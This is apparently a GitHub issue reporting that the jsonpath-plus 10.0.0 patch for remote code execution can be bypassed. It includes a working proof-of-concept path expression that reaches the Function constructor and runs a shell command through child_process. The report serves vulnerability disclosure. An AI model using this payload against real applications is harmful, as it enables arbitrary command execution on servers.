Describe the bug
JSONPath Plus Remote Code Execution (RCE) Vulnerability has been patched in version 10.0.0, but Remote Code Execution (RCE) is still possible with the payload below as the path value.
Code sample or steps to reproduce
const { JSONPath } = require("jsonpath-plus"); // jsonpath-plus == 10.0.0 // $[?(var _$_root=[].constructor.constructor("console.log(this.process.mainModule.require(\\"child_process\\").execSync(\\"id\\").toString())");@root())] const result = JSONPath({ path: '$[?(var _$_root=[].constructor.constructor("console.log(this.process.mainModule.require(\\"child_process\\").execSync(\\"id\\").toString())");@root())]', json: { a: "x" }, });
Expected behavior
- Potential Remote Code Execution (RCE)
- Potential Cross-site scripting (XSS)
Environment (IMPORTANT)
- JSONPath-Plus version: 10.0.0
Desktop**
- OS: macOS
- Node Version v21.7.3
CC @shpik-kr